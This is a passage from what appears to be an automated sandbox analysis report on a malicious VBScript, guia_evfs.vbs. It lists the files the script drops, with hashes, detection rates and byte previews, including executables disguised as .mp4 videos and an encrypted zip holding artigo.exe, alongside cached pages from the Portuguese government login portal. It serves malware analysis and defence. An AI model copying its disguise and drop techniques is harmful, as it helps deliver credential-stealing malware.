                                                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: guia_evfs.vbs, Detection: malicious, Browse
                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d....4g..........".......<...........<.......@..............................P............`..........@............... ............... D.q.....C.HF....J......`G..............PD.T............................@D.(.....................C.......D......................text...h.<.......<................. ..`.data...8.....=.......<.............@....bss....p.....B..........................idata..HF....C..H....B.............@....didata.......D.......B.............@....edata..q.... D.......C.............@..@.tls.........0D..........................rdata..m....@D.......C.............@..@.reloc..T....PD.......C.............@..B.pdata.......`G.......F.............@..@.rsrc.........J.......I.............@..@.debug...............J..............@..@

                                                                                                                C:\Users\Public\ler1255.txt

                                                                                                                Download File
                                                                                                                Process:C:\Intrumental\lspcv2.exe
                                                                                                                File Type:ASCII text, with very long lines (510), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):510
                                                                                                                Entropy (8bit):5.309189537458223
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:fQJzFA8SvxnAWxFA8SvxnAWxFA8SvxnAWxFA8SvxnAKP7dbyk:tvVivVivVivVLP9yk
                                                                                                                MD5:8CC325C4A72B846A690145124F81749A
                                                                                                                SHA1:BE760703C6F20E0E5AA1669F8ED2BA768C094153
                                                                                                                SHA-256:5B8C8102B38AE345AC65A8E1D6AFF7DAB84C0D82258624C1511A0C79109AC868
                                                                                                                SHA-512:22C793FE721D6A4B6314474B3A678D74C917BC2E4170CF30BB525FF757AA520A6E427E832EDFDA1DC0D9B25473FA648212C72475EE5329630C29994F6AF2D1B0
                                                                                                                Malicious:false
                                                                                                                Preview:MrP1Kab1LaL9KqzBNGqAQ7HqS3elBpaqBZ8qCIunD34kCJ0nBtHbPoyD2cXqT70wBoyvD2uoD34kCJGnBZ4mCIzqPMSl3GfeT7HmEYylEJGkCZGnBZ4qCIunC34lT6LdBmqAQ7HqS3elBpaqBZ8qCIunD34kCJ0nBtHbPoyD2cXqT70wBoyvD2uoD34kCJGnBZ4mCIzqPMSl3GfeT7HmEYylEJGkCZGnBZ4qCIunC34lT6LdBmqAQ7HqS3elBpaqBZ8qCIunD34kCJ0nBtHbPoyD2cXqT70wBoyvD2uoD34kCJGnBZ4mCIzqPMSl3GfeT7HmEYylEJGkCZGnBZ4qCIunC34lT6LdBmqAQ7HqS3elBpaqBZ8qCIunD34kCJ0nBtHbPoyD2cXqT70wBoyvD2uoD34kCJGnBZ4mCIzqPMSl3GfeT7HmEYylEJGkCZGnBZ4qCIunC34lT6LdBmqAMq5KLK5CILf1JqPT3GenE30t3GfiR0qACWqAS79mS0

                                                                                                                C:\Users\Public\ler2195.txt

                                                                                                                Download File
                                                                                                                Process:C:\Intrumental\lspcv2.exe
                                                                                                                File Type:ASCII text, with very long lines (510), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):510
                                                                                                                Entropy (8bit):5.309189537458223
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:fQJzFA8SvxnAWxFA8SvxnAWxFA8SvxnAWxFA8SvxnAKP7dbyk:tvVivVivVivVLP9yk
                                                                                                                MD5:8CC325C4A72B846A690145124F81749A
                                                                                                                SHA1:BE760703C6F20E0E5AA1669F8ED2BA768C094153
                                                                                                                SHA-256:5B8C8102B38AE345AC65A8E1D6AFF7DAB84C0D82258624C1511A0C79109AC868
                                                                                                                SHA-512:22C793FE721D6A4B6314474B3A678D74C917BC2E4170CF30BB525FF757AA520A6E427E832EDFDA1DC0D9B25473FA648212C72475EE5329630C29994F6AF2D1B0
                                                                                                                Malicious:false
                                                                                                                Preview:MrP1Kab1LaL9KqzBNGqAQ7HqS3elBpaqBZ8qCIunD34kCJ0nBtHbPoyD2cXqT70wBoyvD2uoD34kCJGnBZ4mCIzqPMSl3GfeT7HmEYylEJGkCZGnBZ4qCIunC34lT6LdBmqAQ7HqS3elBpaqBZ8qCIunD34kCJ0nBtHbPoyD2cXqT70wBoyvD2uoD34kCJGnBZ4mCIzqPMSl3GfeT7HmEYylEJGkCZGnBZ4qCIunC34lT6LdBmqAQ7HqS3elBpaqBZ8qCIunD34kCJ0nBtHbPoyD2cXqT70wBoyvD2uoD34kCJGnBZ4mCIzqPMSl3GfeT7HmEYylEJGkCZGnBZ4qCIunC34lT6LdBmqAQ7HqS3elBpaqBZ8qCIunD34kCJ0nBtHbPoyD2cXqT70wBoyvD2uoD34kCJGnBZ4mCIzqPMSl3GfeT7HmEYylEJGkCZGnBZ4qCIunC34lT6LdBmqAMq5KLK5CILf1JqPT3GenE30t3GfiR0qACWqAS79mS0

                                                                                                                C:\Users\Public\ler4151.txt

                                                                                                                Download File
                                                                                                                Process:C:\Intrumental\lspcv2.exe
                                                                                                                File Type:ASCII text, with very long lines (510), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):510
                                                                                                                Entropy (8bit):5.309189537458223
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:fQJzFA8SvxnAWxFA8SvxnAWxFA8SvxnAWxFA8SvxnAKP7dbyk:tvVivVivVivVLP9yk
                                                                                                                MD5:8CC325C4A72B846A690145124F81749A
                                                                                                                SHA1:BE760703C6F20E0E5AA1669F8ED2BA768C094153
                                                                                                                SHA-256:5B8C8102B38AE345AC65A8E1D6AFF7DAB84C0D82258624C1511A0C79109AC868
                                                                                                                SHA-512:22C793FE721D6A4B6314474B3A678D74C917BC2E4170CF30BB525FF757AA520A6E427E832EDFDA1DC0D9B25473FA648212C72475EE5329630C29994F6AF2D1B0
                                                                                                                Malicious:false
                                                                                                                Preview:MrP1Kab1LaL9KqzBNGqAQ7HqS3elBpaqBZ8qCIunD34kCJ0nBtHbPoyD2cXqT70wBoyvD2uoD34kCJGnBZ4mCIzqPMSl3GfeT7HmEYylEJGkCZGnBZ4qCIunC34lT6LdBmqAQ7HqS3elBpaqBZ8qCIunD34kCJ0nBtHbPoyD2cXqT70wBoyvD2uoD34kCJGnBZ4mCIzqPMSl3GfeT7HmEYylEJGkCZGnBZ4qCIunC34lT6LdBmqAQ7HqS3elBpaqBZ8qCIunD34kCJ0nBtHbPoyD2cXqT70wBoyvD2uoD34kCJGnBZ4mCIzqPMSl3GfeT7HmEYylEJGkCZGnBZ4qCIunC34lT6LdBmqAQ7HqS3elBpaqBZ8qCIunD34kCJ0nBtHbPoyD2cXqT70wBoyvD2uoD34kCJGnBZ4mCIzqPMSl3GfeT7HmEYylEJGkCZGnBZ4qCIunC34lT6LdBmqAMq5KLK5CILf1JqPT3GenE30t3GfiR0qACWqAS79mS0

                                                                                                                C:\Users\Public\ler8109.txt

                                                                                                                Download File
                                                                                                                Process:C:\Intrumental\lspcv2.exe
                                                                                                                File Type:ASCII text, with very long lines (510), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):510
                                                                                                                Entropy (8bit):5.309189537458223
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:fQJzFA8SvxnAWxFA8SvxnAWxFA8SvxnAWxFA8SvxnAKP7dbyk:tvVivVivVivVLP9yk
                                                                                                                MD5:8CC325C4A72B846A690145124F81749A
                                                                                                                SHA1:BE760703C6F20E0E5AA1669F8ED2BA768C094153
                                                                                                                SHA-256:5B8C8102B38AE345AC65A8E1D6AFF7DAB84C0D82258624C1511A0C79109AC868
                                                                                                                SHA-512:22C793FE721D6A4B6314474B3A678D74C917BC2E4170CF30BB525FF757AA520A6E427E832EDFDA1DC0D9B25473FA648212C72475EE5329630C29994F6AF2D1B0
                                                                                                                Malicious:false
                                                                                                                Preview:MrP1Kab1LaL9KqzBNGqAQ7HqS3elBpaqBZ8qCIunD34kCJ0nBtHbPoyD2cXqT70wBoyvD2uoD34kCJGnBZ4mCIzqPMSl3GfeT7HmEYylEJGkCZGnBZ4qCIunC34lT6LdBmqAQ7HqS3elBpaqBZ8qCIunD34kCJ0nBtHbPoyD2cXqT70wBoyvD2uoD34kCJGnBZ4mCIzqPMSl3GfeT7HmEYylEJGkCZGnBZ4qCIunC34lT6LdBmqAQ7HqS3elBpaqBZ8qCIunD34kCJ0nBtHbPoyD2cXqT70wBoyvD2uoD34kCJGnBZ4mCIzqPMSl3GfeT7HmEYylEJGkCZGnBZ4qCIunC34lT6LdBmqAQ7HqS3elBpaqBZ8qCIunD34kCJ0nBtHbPoyD2cXqT70wBoyvD2uoD34kCJGnBZ4mCIzqPMSl3GfeT7HmEYylEJGkCZGnBZ4qCIunC34lT6LdBmqAMq5KLK5CILf1JqPT3GenE30t3GfiR0qACWqAS79mS0

                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\conf[1].txt

                                                                                                                Download File
                                                                                                                Process:C:\Intrumental\lspcv2.exe
                                                                                                                File Type:ASCII text, with very long lines (510), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):510
                                                                                                                Entropy (8bit):5.309189537458223
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:fQJzFA8SvxnAWxFA8SvxnAWxFA8SvxnAWxFA8SvxnAKP7dbyk:tvVivVivVivVLP9yk
                                                                                                                MD5:8CC325C4A72B846A690145124F81749A
                                                                                                                SHA1:BE760703C6F20E0E5AA1669F8ED2BA768C094153
                                                                                                                SHA-256:5B8C8102B38AE345AC65A8E1D6AFF7DAB84C0D82258624C1511A0C79109AC868
                                                                                                                SHA-512:22C793FE721D6A4B6314474B3A678D74C917BC2E4170CF30BB525FF757AA520A6E427E832EDFDA1DC0D9B25473FA648212C72475EE5329630C29994F6AF2D1B0
                                                                                                                Malicious:false
                                                                                                                Preview:MrP1Kab1LaL9KqzBNGqAQ7HqS3elBpaqBZ8qCIunD34kCJ0nBtHbPoyD2cXqT70wBoyvD2uoD34kCJGnBZ4mCIzqPMSl3GfeT7HmEYylEJGkCZGnBZ4qCIunC34lT6LdBmqAQ7HqS3elBpaqBZ8qCIunD34kCJ0nBtHbPoyD2cXqT70wBoyvD2uoD34kCJGnBZ4mCIzqPMSl3GfeT7HmEYylEJGkCZGnBZ4qCIunC34lT6LdBmqAQ7HqS3elBpaqBZ8qCIunD34kCJ0nBtHbPoyD2cXqT70wBoyvD2uoD34kCJGnBZ4mCIzqPMSl3GfeT7HmEYylEJGkCZGnBZ4qCIunC34lT6LdBmqAQ7HqS3elBpaqBZ8qCIunD34kCJ0nBtHbPoyD2cXqT70wBoyvD2uoD34kCJGnBZ4mCIzqPMSl3GfeT7HmEYylEJGkCZGnBZ4qCIunC34lT6LdBmqAMq5KLK5CILf1JqPT3GenE30t3GfiR0qACWqAS79mS0

                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\preferencia[1].cdr

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\wscript.exe
                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                Category:dropped
                                                                                                                Size (bytes):18292220
                                                                                                                Entropy (8bit):7.998857421458994
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:393216:d68zAibFiPbPSmQahTBmraKohh6fg0J1cx7FqzL09SiDb6l7:cwxbFiPbqmQahTEr1oh06Jqn095b6l7
                                                                                                                MD5:9029E36BDCE303D81F2BBD1869A8E147
                                                                                                                SHA1:D8D715FB21DEFDA4D56A363C97423D481F8F3C93
                                                                                                                SHA-256:184F6393E1222558122593F4DB0CF03D45F6D99A1D7E39EE7994A2B9AFEF7018
                                                                                                                SHA-512:25669F81CE3DFADF77B2017633C79525F7958EE18F052CB83A6B8650FFFD0B097973082A416786114A34269CA1A35239B8CDBEC94F7799BBFD9AD0BC73D5A0DB
                                                                                                                Malicious:false
                                                                                                                Preview:PK........wWmY.............. .Termos/UT.....4g..4gk.4gux.............PK.........WmY.............. .Termos/artigo.exeUT....4g..4g..4gux..............}.xTE...-.l....n4.c..`..!...6t J.A...n...;... ..r..Fgy...1.8..{3.......(I.%.{..8A.7...G....N.K/aQ...GnU.S..9u...u..{*.=.0F.e.Q...H?.s5s..a.X....-...t.7.wvV.nh...6............^....T..Z.64...>.v.....0..g2.tL_%..270.z3...<v..:R8r..X0a..0..K.uR...t.L..35.RM.[U.H...y...K.n.21.a..b..;..A.p.S.....t.d....$...V.P....D.T....... .,....k....j!]........x^..........u..O_.3./4.A"Hd.....%...%D..2..x.%.sK..A...K..lS}...6....W...T..2........o........W2u.D..).-.4<....^...3h..-...W......+... ........l.@....Fwm..I.P.i^mc..X...S.?..s.E..(To.7.4.....:QF..SC.iF...E....m.p.y..f....c...f..6.......z...C2<.@.Un/.*A......|.X../[./m..'.g....Zo}CSm.I.F....G.V47..^.".PC....7s.,uT.mV..*.Ti.......S<c..U.n......h........_./k.....Q.!..X.v.A..2R.S..z.Mu...,...2H?-.y.y..F.G.U..P(..._./m.w#.Z.o.p....mO.....1.]J=.7....m.X.A....i..S.F.X..Q.p

                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\alphaville[1].mp4

                                                                                                                Download File
                                                                                                                Process:C:\Users\Public\Termos\artigo.exe
                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):19375329
                                                                                                                Entropy (8bit):5.784574984483087
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:393216:DYmHv3sV7zW8tZAxQlmbRpi6GbyUjA1eHOI1izeYgHdSu2Je4QG0a1SaNWoRvahP:cmHv3sV7zW8tZAxQlmbRpi6GbyUjA1e7
                                                                                                                MD5:971CB0CF2672A22241854896998DDE20
                                                                                                                SHA1:F3C6338B7319C20FB56FA471202B631364BE81F1
                                                                                                                SHA-256:7036468E471E0432E12A7736867FC03ED3A7283877296E7ECFC7B8C2CF91F258
                                                                                                                SHA-512:EC2943865B2C6769962001375AF3FFBCEAE56A9A12F2D98771D4AFB4C03B2275BA37304C801F337450C528D6F3C1D9254DC5830CFE6230A4A06C45585A5DCF62
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d....}4g..........".......H...........G.......@...............................(...........`..........@............... ................Q.q.....P.vH....X.......T..............@Q.p^....\......................0Q.(...................8.P.......P......................text.....H.......H................. ..`.data...8.....H.......H.............@....bss..........O..........................idata..vH....P..J....O.............@....didata.......P.......O.............@....edata..q.....Q.......P.............@..@.tls......... Q..........................rdata..m....0Q.......P.............@..@.reloc..p^...@Q..`....P.............@..B.pdata........T......pS.............@..@.rsrc.........X......fW.............@..@.debug...f....\..f...>[.............@..@

                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\basketchampion[1].mp4

                                                                                                                Download File
                                                                                                                Process:C:\Users\Public\Termos\artigo.exe
                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):32891509
                                                                                                                Entropy (8bit):6.984510229105189
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:786432:dGN9uNwx0JaNeQ37X6e7Wmv/T3JILcyoGMYRV+Aal4VqTbWvqeifLAdUpO/7Ajka:0uNmQQLX6e7Wmv/T3JILcyoGMYRV+AaR
                                                                                                                MD5:2047B6AC02B7C454F61D7E90EE1608FE
                                                                                                                SHA1:B1B2B9321AC1BB01FF0DC667D01C136B14AC8448
                                                                                                                SHA-256:FC8EF9246E4D3804573FA486B0C29CE6F795CA06CFCA36B61F2248E9A4C5FF7A
                                                                                                                SHA-512:D6F67A5BEF88F325A80436AD507893302BE5E2C15D130AF2D49B87509F4074EAEE83B4318175DA61FDF1A98A37A8BFCDD071389C3C82F2D69285CFA901B2CD59
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d.....4g..........".......H.u\......0.G.......@..............................@............`..........@............... ................P.q....`P.vH...`X......`T...............Q..]....+.......................P.(...................8rP.......P......................text...X.H.......H................. ..`.data.........H.......H.............@....bss....H.....O..........................idata..vH...`P..J...\O.............@....didata.......P.......O.............@....edata..q.....P.......O.............@..@.tls..........P..........................rdata..m.....P.......O.............@..@.reloc...]....Q..^....O.............@..B.pdata.......`T.......S.............@..@.rsrc........`X.......W.............@..@.debug..u,....+.u,....).............@..@

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\wscript.exe
                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                Category:dropped
                                                                                                                Size (bytes):7168
                                                                                                                Entropy (8bit):4.33498652991827
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:r+KRsPeyq/1AVW0T1MqughNY1IkAKOSuPlQ95Sut1y7MOkh3vadRNJykhuLdHxRb:Hp5UJ4CljM58dRequRRMKF15h
                                                                                                                MD5:7EF557BFBCC455B975A932F6ECE6A1C9
                                                                                                                SHA1:F171C2428996A33B40841B6A365B838359B9AD41
                                                                                                                SHA-256:6CB56ACF319A26EF2E9B0075D6119DE5507F2279AFA0871B6384B2D84A8EC639
                                                                                                                SHA-512:CE4F2B5838DBFF4F2A950F9ED6B1AB94E6398B3EDFE7E0D787BF861ABB88877644B3B0B9B53D05291CCDDF8810BF5DDA13C0C036F6048B5CA1B00730661690F4
                                                                                                                Malicious:false
                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                Chrome Cache Entry: 100

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with very long lines (3614)
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):52750
                                                                                                                Entropy (8bit):5.126938085076369
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:BWb7KCiCNGgkh6CITR/Pi9nZPZF63G8TKn2a5IhtD8JruIkdfFcAfruQ:BWb7KCiCXvCIN/PipFFd2a5Cp
                                                                                                                MD5:0018B40D63991C2CF7FAEF055278D18A
                                                                                                                SHA1:74DB551A452CD34B4350ADB690C94D5CD0FCDC3F
                                                                                                                SHA-256:804A8CD28C517C5325DCF9283373C0B3D0387AF2A5AB6DD6D73AFDD65026565F
                                                                                                                SHA-512:F810D51B517F045E1EBAB2DF9942CF6C8A86529C7273A20157E77A4D3D0C47C725C946115F5F9B2DD47066BCB32446822702DA02059E3AC09E69ABC6F91096D8
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/css/styles.css?cb=5.2.10
                                                                                                                Preview:..main-header-body{background:#ffffff;border-bottom:solid 1px #ececec;padding:15px 0;position:relative;z-index:1;-webkit-box-shadow:0px 3px 5px 0px rgba(50, 50, 50, 0.35);-moz-box-shadow:0px 3px 5px 0px rgba(50, 50, 50, 0.35);box-shadow:0px 3px 5px 0px rgba(50, 50, 50, 0.35);}..shadow{-webkit-box-shadow:0px 3px 5px 0px rgba(50, 50, 50, 0.35);-moz-box-shadow:0px 3px 5px 0px rgba(50, 50, 50, 0.35);box-shadow:0px 3px 5px 0px rgba(50, 50, 50, 0.35);}..logo{display:block;}.logo img{width:210px;height:auto !important;}.nav ul{text-align:right;margin-top:10px;margin-bottom:0;}.nav li{display:inline-block;list-style:none;text-align:center;margin-left:30px;max-width:130px;}.nav a{color:#031437;font-weight:700;text-transform:uppercase;font-size:16px;display:block;}nav a:hover{color:#0375f6;}..burger-menu{display:none;}..main-header-title{margin-top:24px;}.main-header-title p{font-weight:700;font-size:24px;text-transform:uppercase;text-align:center;color:#001C44;}..orange{background-color:#ff604e

                                                                                                                Chrome Cache Entry: 101

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):58651
                                                                                                                Entropy (8bit):3.8223322827985586
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:IWb2inOxtoJ6VpwRl13/+4gw0SnG/0S8f0S8wkGfktk/mhE+:Bb22OxOJ6Vpw/13m4gSmhE+
                                                                                                                MD5:7CEF22B9E1BF64EC9597396229900B3A
                                                                                                                SHA1:8E9024B218DCAE87E5451663753BC8607110A2C0
                                                                                                                SHA-256:9206C9C869B248A0BC222DB370113845B0D7BEC0FB0C7CE7AF957D9D2AB2E28D
                                                                                                                SHA-512:D9AEDD640CFDFA3E50425C781FB6C05484DDFCDFCE5946AB07C2C489C59C4E37EC7B93DF79F75FF6084742BA64A46494A210F80D8ABCE071DBB1C1F914F504A5
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/js/app.js?cb=5.2.10
                                                                                                                Preview:(function ($) {.. if (!window.SA) {.. SA = {};.. }.... //*.. //* Generic Modal Function (Open and Close).. //*.... SA.Modal = function () {.. return {.. Open: function (id, callback) {.. id.fadeIn(600);.. $('html, body').stop().animate({ scrollTop: id.css('margin-top') }, 600);.... if(callback) {.. callback();.. }.. },.. Close: function (id, callback) {.. id.fadeOut(600);.... if(callback) {.. callback();.. }.. }.. };.. }();.... //*.. //* Form: Novo Utilizador.. //*.... SA.newUserForm = function () {.. var theForm = $('#newUserForm'),.. submitBtn = theForm.find('input[type=submit]'),.. notifications = theForm.find('#notifications'),.. inputEmail = theForm.find('input[type=email]'),.. checkboxEmail =

                                                                                                                Chrome Cache Entry: 102

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:dropped
                                                                                                                Size (bytes):622
                                                                                                                Entropy (8bit):7.501607211318584
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:6v/7ykLcz6raGkOz9ecCXMV5uG9FqwsDBvEbH0SPRoCm:/+rsOMtXiu8ApEYaRHm
                                                                                                                MD5:D85725EF09B4F2C2065C1989A027B57B
                                                                                                                SHA1:82A93CC5C31B84278B00BDA52CD8F947211CC4E9
                                                                                                                SHA-256:827204D59451BFAE63E5273AB111FC887D65104855B39DC8356D320AC97072D6
                                                                                                                SHA-512:E8EE36E3CA80E3856922BC5972071CD9B1B8828270F517F536FCC045BBD00BBFACAFBE9BA4129323E0AB57BE32A766A539DDAF5B1BE6FF5DED57B61A2A283257
                                                                                                                Malicious:false
                                                                                                                Preview:.PNG........IHDR.....................gAMA......a.....pHYs..........d_.....tIME......#d..f....tEXtSoftware.paint.net 4.0.9l3~N....IDAT8O..K.p...6......1.v..!./t..Cp..P...&V.N..SV...:.C1I;l.V[.XT.`..2/M._..ue.-Y.../.s~...I...p.R..%T.:J.'..{f.06NH.y!W.8Qfy...."...+..`.o.QT..2..6K.7#..'Np~.@.j..m.x....K......VV.>.b<g...:. 9....G]....%*.0b.i .A..S5..n...V...+.M#....P.v...@Uw......Cx./hx~..Ca8.g<....#......$W.)!.L#qp..,..)ddE5...X.?/x......:..7.3v..8.C.).;...P..@.-......Y+[^.K...x..[x...]..M<...Z...[...P.<./2.0.3...$c.|.".{.[E...R....R.G...a d.. ....Kcy....%<.....%.<j....f.m0..(.....=.....IEND.B`.

                                                                                                                Chrome Cache Entry: 103

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1609
                                                                                                                Entropy (8bit):4.686265065538421
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:mLHhP7OIkn2UFiOiV6eigpigNzbak/ef4igtjf4i0/WWig7RWiK:MB02CiOiTi8ioa6iriGijiK
                                                                                                                MD5:430DE688693604EBDF8B06F389A8E12E
                                                                                                                SHA1:98450828D02A8486B92FE86E56CD0B2D1E1B4D42
                                                                                                                SHA-256:E17E63ADB656344E4B23F5A7C6C0F70580551920BDE557D38C9C73A1E9ECF5A3
                                                                                                                SHA-512:FCF3DA5DEC2D2AC53278667EFEB95C784215C15610DF1A6A7E22A2A651F704DA857A764ED46AF712937B9367153882418E3526BA26453D645A916FC3500D3FC1
                                                                                                                Malicious:false
                                                                                                                Preview:var capslockActive = false;..var inputNif = document.getElementById("password-nif");..var inputEori = document.getElementById("password-eori");....function capsLockEventDetect(event) {.. var capsNif = document.getElementById("caps-nif");.. var capsEori = document.getElementById("caps-eori");.. var curr = document.activeElement;.... if (event.getModifierState !== undefined && event.getModifierState("CapsLock")) {.. capslockActive = true;.. if (inputNif === curr) {.. capsNif.style.display = "block";.. }.. else if (capsEori && inputEori === curr) {.. capsEori.style.display = "block";.. }.. } else {.. capslockActive = false;.. capsNif.style.display = "none";.. if (capsEori) {.. capsEori.style.display = "none";.. }.. }..}....document.addEventListener("keydown", function(event) {.. capsLockEventDetect(event);..});....if (inputNif) {.. inputNif.addEventListener("blur", funct

                                                                                                                Chrome Cache Entry: 104

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 618 x 166, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:dropped
                                                                                                                Size (bytes):10264
                                                                                                                Entropy (8bit):7.893606373253685
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:r9/l7HNm2qUdKrEC+VmNIgargB0UFj6jbUpm5e93/YmkpcAX:r9lHXC3ug9FCP5e9vLnAX
                                                                                                                MD5:91E9E0C62F158101C511C746B98AB45D
                                                                                                                SHA1:3D9E122EA989782126594142F5AD03E257A1D96C
                                                                                                                SHA-256:A2BC8BF86EF8D948D5CB87EC1E4B185BF87CF4A731F2F93EA5CC29AE64302AF6
                                                                                                                SHA-512:4C8EDE889D61BE5474BF341283FE2E7756E37E9B5B466F47B1709316EF72088584104F914274E035B1BF36812A80865EDE06DAC044704EFA0C8C72436D3812CE
                                                                                                                Malicious:false
                                                                                                                Preview:.PNG........IHDR...j.........jg......sRGB.........gAMA......a.....pHYs..........o.d..'.IDATx^.{.....w.V.j=m.m......sNo.... .QPPT.U.."^B..!@H !\C...........w3.W&.Y3{f..=..y.G...5..g.....o..B.!....5B.!...B.F.!...Sh..!..Br...!..BHN.m.f.....m54>MQ.iljF}....UF.!...HF......9..W..%.....3.J\.......:.._..!....d..f....C.....k....7.+..B.)..F.opB}{]...........D.!...@...sR}..........I.!....Q...\=..1.IQ.R.A..%..B...Q.}.....j.uMj....!....!........]..J.!..7.Q.>.> )*....v.J%..B....i.......=...R.!...F4j..=/> )*/....VB.!.~...K..........3!..R..Q5).5B.!E.F..I..B.).4jTM.F..BH..Q.jR4j..B....U..Q#..R.h.(u....8...>..4...]...+#....zsR..L..s.....!.."@.V@...cj[K.:.?Z6<X2,...cb_....!.."@.V.!b...r.l&..4j..BH.........W....0h..!...Q.3}....<..Y..L..5B.!${h..D....w.....g.4j..BH....T.#.j6f.+4j..BH......RS..o-]h..!...Q.A=.z.:{u.....F..B..........KlT...!...=4j5".v.9..M..5B.!${h.j@.....Ny.Nu.Q#..B..F-.z|S....f.@.4j..BH...X.{.T"..$...!...=4j9.LZ...$h..!...Q..f...

                                                                                                                Chrome Cache Entry: 105

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):622
                                                                                                                Entropy (8bit):7.501607211318584
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:6v/7ykLcz6raGkOz9ecCXMV5uG9FqwsDBvEbH0SPRoCm:/+rsOMtXiu8ApEYaRHm
                                                                                                                MD5:D85725EF09B4F2C2065C1989A027B57B
                                                                                                                SHA1:82A93CC5C31B84278B00BDA52CD8F947211CC4E9
                                                                                                                SHA-256:827204D59451BFAE63E5273AB111FC887D65104855B39DC8356D320AC97072D6
                                                                                                                SHA-512:E8EE36E3CA80E3856922BC5972071CD9B1B8828270F517F536FCC045BBD00BBFACAFBE9BA4129323E0AB57BE32A766A539DDAF5B1BE6FF5DED57B61A2A283257
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/img/iconGovPt_20x20.png
                                                                                                                Preview:.PNG........IHDR.....................gAMA......a.....pHYs..........d_.....tIME......#d..f....tEXtSoftware.paint.net 4.0.9l3~N....IDAT8O..K.p...6......1.v..!./t..Cp..P...&V.N..SV...:.C1I;l.V[.XT.`..2/M._..ue.-Y.../.s~...I...p.R..%T.:J.'..{f.06NH.y!W.8Qfy...."...+..`.o.QT..2..6K.7#..'Np~.@.j..m.x....K......VV.>.b<g...:. 9....G]....%*.0b.i .A..S5..n...V...+.M#....P.v...@Uw......Cx./hx~..Ca8.g<....#......$W.)!.L#qp..,..)ddE5...X.?/x......:..7.3v..8.C.).;...P..@.-......Y+[^.K...x..[x...]..M<...Z...[...P.<./2.0.3...$c.|.".{.[E...R....R.G...a d.. ....Kcy....%<.....%.<j....f.m0..(.....=.....IEND.B`.

                                                                                                                Chrome Cache Entry: 106

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):58651
                                                                                                                Entropy (8bit):3.8223322827985586
                                                                                                                Encrypted:false
